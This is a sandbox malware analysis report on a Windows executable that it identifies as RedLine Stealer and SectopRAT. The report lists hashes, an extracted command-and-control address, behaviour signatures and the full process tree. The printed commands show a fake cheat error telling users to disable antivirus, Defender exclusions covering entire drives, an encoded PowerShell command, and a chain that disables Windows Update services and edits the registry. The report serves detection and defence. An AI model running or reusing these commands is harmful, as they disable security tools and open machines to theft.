Analysis
-
max time kernel
149s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
07-11-2024 10:48
Static task
static1
Behavioral task
behavioral1
Sample
06293c3726a8b6029225668dcfb8c7e8.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
06293c3726a8b6029225668dcfb8c7e8.exe
Resource
win10v2004-20241007-en
General
-
Target
06293c3726a8b6029225668dcfb8c7e8.exe
-
Size
7.3MB
-
MD5
06293c3726a8b6029225668dcfb8c7e8
-
SHA1
1db3a38e9cff8b2aec7b73668e6768002c2bddbf
-
SHA256
ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
-
SHA512
33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
-
SSDEEP
196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr
Malware Config
Extracted
redline
Lucifer
162.55.169.73:49194
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\explorer.exe family_redline behavioral1/memory/2164-31-0x00000000009E0000-0x00000000009FE000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\explorer.exe family_sectoprat behavioral1/memory/2164-31-0x00000000009E0000-0x00000000009FE000-memory.dmp family_sectoprat -
Sectoprat family
-
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.exepid process 2640 powershell.EXE 2664 powershell.exe 2560 powershell.exe 2600 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
conhost.execonhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 1380 takeown.exe 1580 icacls.exe 264 takeown.exe 2892 icacls.exe 1688 takeown.exe 2280 icacls.exe 1876 takeown.exe 2332 icacls.exe -
Executes dropped EXE 7 IoCs
Processes:
explorer.exewindowshost.exesvchost.exesvchost.execominto.exeupdater.exeupdater.exepid process 2164 explorer.exe 2688 windowshost.exe 2652 svchost.exe 2624 svchost.exe 1276 cominto.exe 1880 updater.exe 2928 updater.exe -
Loads dropped DLL 8 IoCs
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execmd.exepid process 2160 cmd.exe 2608 cmd.exe 2944 cmd.exe 2932 cmd.exe 2380 cmd.exe 2380 cmd.exe 708 cmd.exe 1812 cmd.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 1876 takeown.exe 2332 icacls.exe 1380 takeown.exe 1580 icacls.exe 264 takeown.exe 2892 icacls.exe 1688 takeown.exe 2280 icacls.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 20 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepid process 2736 powercfg.exe 1760 cmd.exe 2056 powercfg.exe 296 powercfg.exe 2752 powercfg.exe 2648 powercfg.exe 2416 powercfg.exe 2500 powercfg.exe 2544 cmd.exe 316 cmd.exe 3012 powercfg.exe 2840 powercfg.exe 2492 powercfg.exe 1988 powercfg.exe 2476 powercfg.exe 3048 powercfg.exe 2104 powercfg.exe 2524 cmd.exe 2392 powercfg.exe 1568 powercfg.exe -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
conhost.execonhost.execonhost.execonhost.exedescription pid process target process PID 536 set thread context of 2504 536 conhost.exe conhost.exe PID 2268 set thread context of 1016 2268 conhost.exe conhost.exe PID 2620 set thread context of 1808 2620 conhost.exe conhost.exe PID 1492 set thread context of 2232 1492 conhost.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe -
Launches sc.exe 60 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2800 sc.exe 3028 sc.exe 1084 sc.exe 1684 sc.exe 2472 sc.exe 2580 sc.exe 1904 sc.exe 1672 sc.exe 1744 sc.exe 2460 sc.exe 288 sc.exe 2676 sc.exe 1892 sc.exe 600 sc.exe 2508 sc.exe 1880 sc.exe 2060 sc.exe 2936 sc.exe 2984 sc.exe 868 sc.exe 1944 sc.exe 1916 sc.exe 1908 sc.exe 2596 sc.exe 2872 sc.exe 1856 sc.exe 2272 sc.exe 2496 sc.exe 2748 sc.exe 2016 sc.exe 2600 sc.exe 2684 sc.exe 1964 sc.exe 1224 sc.exe 1456 sc.exe 2084 sc.exe 2932 sc.exe 2796 sc.exe 2572 sc.exe 1884 sc.exe 1424 sc.exe 1928 sc.exe 2448 sc.exe 2700 sc.exe 2320 sc.exe 324 sc.exe 2440 sc.exe 2348 sc.exe 2412 sc.exe 2548 sc.exe 2200 sc.exe 2332 sc.exe 684 sc.exe 1684 sc.exe 2892 sc.exe 592 sc.exe 408 sc.exe 2476 sc.exe 2456 sc.exe 1936 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
06293c3726a8b6029225668dcfb8c7e8.execmd.exewindowshost.exepowershell.exepowershell.execmd.execmd.execmd.execmd.exepowershell.exeexplorer.exeWScript.exepowershell.EXEcmd.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06293c3726a8b6029225668dcfb8c7e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windowshost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0b2068a0231db01 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2272 schtasks.exe 348 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.EXEpowershell.exepowershell.execonhost.execonhost.exepid process 2600 powershell.exe 2664 powershell.exe 2560 powershell.exe 2188 powershell.exe 1540 powershell.exe 536 conhost.exe 2268 conhost.exe 2640 powershell.EXE 2020 powershell.exe 1464 powershell.exe 1492 conhost.exe 2620 conhost.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
powershell.exepowershell.exeexplorer.exepowershell.execominto.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.execonhost.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEpowershell.exepowershell.execonhost.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2164 explorer.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 1276 cominto.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeShutdownPrivilege 2476 powercfg.exe Token: SeShutdownPrivilege 3048 powercfg.exe Token: SeShutdownPrivilege 2104 powercfg.exe Token: SeDebugPrivilege 2268 conhost.exe Token: SeDebugPrivilege 536 conhost.exe Token: SeShutdownPrivilege 2752 powercfg.exe Token: SeShutdownPrivilege 2736 powercfg.exe Token: SeShutdownPrivilege 2840 powercfg.exe Token: SeShutdownPrivilege 3012 powercfg.exe Token: SeShutdownPrivilege 2648 powercfg.exe Token: SeDebugPrivilege 2640 powershell.EXE Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 1492 conhost.exe Token: SeDebugPrivilege 2620 conhost.exe Token: SeShutdownPrivilege 2056 powercfg.exe Token: SeShutdownPrivilege 296 powercfg.exe Token: SeShutdownPrivilege 2392 powercfg.exe Token: SeShutdownPrivilege 1568 powercfg.exe Token: SeShutdownPrivilege 2416 powercfg.exe Token: SeShutdownPrivilege 2500 powercfg.exe Token: SeShutdownPrivilege 2492 powercfg.exe Token: SeShutdownPrivilege 1988 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
06293c3726a8b6029225668dcfb8c7e8.execmd.execmd.execmd.execmd.execmd.execmd.exewindowshost.exeWScript.execmd.exedescription pid process target process PID 2704 wrote to memory of 2772 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2772 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2772 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2772 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2784 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2784 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2784 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2784 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2944 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2944 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2944 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2944 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2932 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2932 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2932 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2932 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2160 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2160 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2160 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2160 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2608 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2608 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2608 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2704 wrote to memory of 2608 2704 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 2772 wrote to memory of 2600 2772 cmd.exe powershell.exe PID 2772 wrote to memory of 2600 2772 cmd.exe powershell.exe PID 2772 wrote to memory of 2600 2772 cmd.exe powershell.exe PID 2772 wrote to memory of 2600 2772 cmd.exe powershell.exe PID 2784 wrote to memory of 2664 2784 cmd.exe powershell.exe PID 2784 wrote to memory of 2664 2784 cmd.exe powershell.exe PID 2784 wrote to memory of 2664 2784 cmd.exe powershell.exe PID 2784 wrote to memory of 2664 2784 cmd.exe powershell.exe PID 2160 wrote to memory of 2164 2160 cmd.exe explorer.exe PID 2160 wrote to memory of 2164 2160 cmd.exe explorer.exe PID 2160 wrote to memory of 2164 2160 cmd.exe explorer.exe PID 2160 wrote to memory of 2164 2160 cmd.exe explorer.exe PID 2608 wrote to memory of 2688 2608 cmd.exe windowshost.exe PID 2608 wrote to memory of 2688 2608 cmd.exe windowshost.exe PID 2608 wrote to memory of 2688 2608 cmd.exe windowshost.exe PID 2608 wrote to memory of 2688 2608 cmd.exe windowshost.exe PID 2932 wrote to memory of 2652 2932 cmd.exe svchost.exe PID 2932 wrote to memory of 2652 2932 cmd.exe svchost.exe PID 2932 wrote to memory of 2652 2932 cmd.exe svchost.exe PID 2932 wrote to memory of 2652 2932 cmd.exe svchost.exe PID 2944 wrote to memory of 2624 2944 cmd.exe svchost.exe PID 2944 wrote to memory of 2624 2944 cmd.exe svchost.exe PID 2944 wrote to memory of 2624 2944 cmd.exe svchost.exe PID 2944 wrote to memory of 2624 2944 cmd.exe svchost.exe PID 2688 wrote to memory of 2200 2688 windowshost.exe WScript.exe PID 2688 wrote to memory of 2200 2688 windowshost.exe WScript.exe PID 2688 wrote to memory of 2200 2688 windowshost.exe WScript.exe PID 2688 wrote to memory of 2200 2688 windowshost.exe WScript.exe PID 2784 wrote to memory of 2560 2784 cmd.exe powershell.exe PID 2784 wrote to memory of 2560 2784 cmd.exe powershell.exe PID 2784 wrote to memory of 2560 2784 cmd.exe powershell.exe PID 2784 wrote to memory of 2560 2784 cmd.exe powershell.exe PID 2200 wrote to memory of 2380 2200 WScript.exe cmd.exe PID 2200 wrote to memory of 2380 2200 WScript.exe cmd.exe PID 2200 wrote to memory of 2380 2200 WScript.exe cmd.exe PID 2200 wrote to memory of 2380 2200 WScript.exe cmd.exe PID 2380 wrote to memory of 1276 2380 cmd.exe cominto.exe PID 2380 wrote to memory of 1276 2380 cmd.exe cominto.exe PID 2380 wrote to memory of 1276 2380 cmd.exe cominto.exe PID 2380 wrote to memory of 1276 2380 cmd.exe cominto.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\06293c3726a8b6029225668dcfb8c7e8.exe"C:\Users\Admin\AppData\Local\Temp\06293c3726a8b6029225668dcfb8c7e8.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- Executes dropped EXE
PID:2624 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="5⤵PID:2336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵PID:2472
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:1684
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
PID:288
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
PID:2508
-
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:2412
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:1880
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled6⤵
- Launches sc.exe
PID:2892
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""6⤵
- Launches sc.exe
PID:2796
-
-
C:\Windows\system32\sc.exesc config bits start= disabled6⤵
- Launches sc.exe
PID:1916
-
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""6⤵
- Launches sc.exe
PID:2572
-
-
C:\Windows\system32\sc.exesc config dosvc start= disabled6⤵
- Launches sc.exe
PID:2748
-
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""6⤵
- Launches sc.exe
PID:2596
-
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled6⤵
- Launches sc.exe
PID:2016
-
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""6⤵
- Launches sc.exe
PID:1424
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled6⤵
- Launches sc.exe
PID:2872
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""6⤵
- Launches sc.exe
PID:1904
-
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1688
-
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2280
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f6⤵PID:296
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f6⤵PID:976
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵PID:1564
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵PID:324
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵PID:920
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵PID:2232
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE6⤵PID:2316
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE6⤵PID:2260
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE6⤵PID:1288
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE6⤵PID:1912
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE6⤵PID:1672
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE6⤵PID:2496
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Power Settings
PID:2544 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
-
